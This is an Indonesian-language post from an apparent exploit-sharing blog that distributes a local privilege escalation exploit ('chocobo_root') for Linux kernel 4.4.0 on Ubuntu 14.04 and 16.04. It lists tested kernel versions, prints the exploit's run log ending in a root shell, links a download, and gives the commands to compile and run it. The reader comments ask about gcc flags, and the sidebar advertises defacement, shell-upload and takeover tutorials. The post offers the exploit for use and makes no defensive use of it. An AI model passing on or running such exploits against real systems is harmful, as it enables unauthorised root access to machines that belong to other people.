• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Linux Kernel 4.4.0 Race Condition Privilege Escalation

December 9, 2016 by Jack Wilder 2 Comments

Yo, Kali ini cuma mau share localroot yang barusaja dipublish beberapa hari yang lalu. Localroot ini menyerang kernel 4.4.0 yang berarti vuln di Ubuntu 14.04 dan Ubuntu 16.04.

Kernel yang sudah di test :
  • Ubuntu 16.04: 4.4.0-51-generic
  • Ubuntu 16.04: 4.4.0-47-generic
  • Ubuntu 16.04: 4.4.0-36-generic
  • Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Kemungkinan localroot ini juga berlaku untuk mendapatkan hak akses root di kernel yang lebih tua dari 4.4.0 . Jadi silahkan di test sendiri saja.
Log :

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 133577, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don’t do that.
closing socket and verifying…….
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),1000(user)

  • Download Localroot

Cara compile :

gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

Oke sekian artikel kali ini, see you next time.
Shares

Filed Under: Uncategorized Tagged With: Exploit, Localroot, Ubuntu

Reader Interactions

Comments

  1. pemakanwortel says

    February 15, 2017 at 5:19 pm

    maaf bang , penjelasan dari
    *gcc
    *chocobo_root.c
    *-o
    *chocobo_root
    *-lpthread

    itu sendiri apa ya? kok disetiap xploit waktu compile beda beda

    Reply
    • chiaki says

      February 23, 2017 at 6:19 am

      ya kan tergantung nam file yg dikompile. dan modul apa yang ingin dikompile

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Heroku Custom Domain or Subdomain Takeover

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

FastMail Custom Domain or Subdomain Takeover

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Laravel PHPUnit Remote Code Execution

RCE pada Redis via Master-Slave Replication

LinuxSec / 67 queries in 0.08 seconds